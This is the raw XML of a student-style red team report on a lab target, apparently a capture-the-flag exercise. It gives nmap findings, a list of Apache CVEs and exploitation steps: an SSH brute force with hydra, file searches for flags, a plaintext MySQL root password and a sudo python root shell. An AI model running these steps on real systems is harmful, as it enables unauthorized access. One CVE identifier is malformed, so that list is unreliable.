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mcw1u1zafldh" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team: Summary of Operations</w:t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i9sr3cv16xwq" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t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Exposed Services</w:t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Critical Vulnerabilities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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8rvzm5oq1c2u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Exposed Services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Nmap scan results for each machine reveal the below services and OS details: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$ nmap -sV 192.168.1.0/24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69342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93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This scan identifies the services below as potential points of entry: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Target 1: 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Port 22: SSH - OpenSSH 6.7p1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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Port 80: HTTP - Apache 2.4.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Port 111: RPC Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="24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Port 445: Netbios - Samba 3.X</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr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following vulnerabilities were identified on each target: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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015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CWE- 521 -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A weak password can result in an attacker gaining unauthorized access into a system to compromise the confidentiality and integrity of an organization’s sensitive information or disrupt the availability of key services. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Misconfiguration -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If a user’s credentials were compromised, a malicious attacker can gain remote access to the system to to view sensitive information, exfiltrate confidential data, or execute remote commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:widowControl w:val="0"/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Unsalted Hashes in database- A lack of salted hashes is susceptible to a brute force attack using pre-computed hashes contained in rainbow tables.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CVE-20212-3163 - Due to a lack of defined security permissions, a remote user can view the credentials stored in the user table to gain unauthorized access. Severity: 6.1 Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:widowControl w:val="0"/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Python root escalation privileges -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By escalating privileges to root, a user can gain full read/write/execute privileges, install unauthorized files or software, modify files or settings, and even delete users and data from the system. Severity: 7.5 High   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-34798  - Vulnerability specific to Apache HTTP 2.4.48 servers where a malicious request will cause a server to dereference a NULL pointer.    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Severity: 7.5 High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CVE-2021-26690 - Maliciously crafted cookie header causing a NULL pointer deference, potentially causing a DDoS attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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CVE-2020-1934 - Vulnerability targeting Apache Servers 2.4.0 to 2.4.41 where uninitialized memory is used when proxying toa  malicious FTP server.    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Severity: 7.5 High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CVE-2019-17567 - Vulnerability in where requests are sent with no HTTP validation, authentication, or authorization configured on HTTP Servers with version 2.4.6 to 2.4.46.                                                                                Severity: 5.3 Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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CVE-2019-0220 - When the URL path component contains multiple slashes, causing the server to account for duplicates and collapse them.               Severity: 5.3 Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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CVE-2018-17199 - Apache server checks the session expiration time before the session is decoded, resulting in the expiration time being ignored for mod_session_cookie sessions.                                                                  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Severity: 7.5 High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CVE-2018-1303 - While data is being prepared to be cached in shared memory, a maliciously crafted HTTP request header could crash the server.          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Severity: 7.5 High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CVE-2017-9798 - Misconfigurations in the http.conf file can lead to an individual reading sensitive information form process memory.                                  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Severity: 7.5 High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CVE-2016-2161 - carefully crafted input to mod_auth_digest can cause the Apache HTTP server to crash.                                                                        </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: 7.5 High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CVE-2015-3183 - The coding implementation of the Apache server does not correctly parse chunk headers, which could lead to an external attacker to conduct a HTTP request smuggling attack.                                                             No score provided yet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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CVE-2015-0228 - A maliciou attacker can cause a DoS attack by sending a specially crafted WebSocket Ping frame when a Lua script calls the wsuupgrade function.                                                                                                                No score provided yet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="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CVE-2014-3583 - The handle_headers function in mod_proxy_fcgi.c in the Apache server will allow FastCGI servers to create long response headers and lead to a DoS attack.                                                                                            No score provided yet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Nmap -sV –script=vulners -v 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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4386263" cy="2709736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46885" l="12500" r="51442" t="26831"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4386263" cy="2709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3586422" cy="4214813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25757" l="12179" r="48076" t="18939"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3586422" cy="4214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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3524250" cy="4103962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26257" l="12660" r="48557" t="19649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103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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_txxds2i1z0xw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Exploitation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The Red Team was able to penetrate Target 1 and retrieve the following confidential data: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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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flag1.txt: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b9bbcb33e11b80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A brute force vulnerability allowed access to Michael’s machine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3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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hydra -l michael -P /usr/share/wordlists/rockyou.txt -f -vV 192.168.1.110 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we gained access to his machine we used a grep command to scan files in the /html directory, which houses the Wordpress infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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grep -i flag* /var/www/html/*</w:t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-828674</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>400050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3799390" cy="2405063"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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9390" cy="24050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3267075</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>542925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3421258" cy="1919050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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1258" cy="1919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3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240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1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag2.txt: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fc3fd58dcdad9ab23faca6e9a36e581c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We remained on Michael’s PC after exploiting the above brute force vulnerability. This time we scanned his file system with a find command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3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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cd /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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find -type f -name *flag*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="288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228975" cy="523875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52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1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag3.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">afc01ab56b50591e7dccf93122770cd2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="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Weak read/write permissions in the mySQL directory allowed us to find the username and password and subsequently access the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="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 flag was then found in the wp-posts table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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mysql -u root -p (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R@v3nSecurity</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="288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before="240" w:lineRule="auto"/>
        <w:ind w:left="288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ind w:left="288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114675" cy="885825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885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968101</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="469900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="288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ind w:left="288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1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag4.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">715dea6c055b9fe3337544932f2941ce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="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Sudo python privileges on Steven’s account were used to escalate to the root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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sudo python -c ‘import pty; pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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cd /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="288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find -type f -name *flag*.txt</w:t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647700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>451438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4953000" cy="5000625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone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5000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10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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5.png"/><Relationship Id="rId14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6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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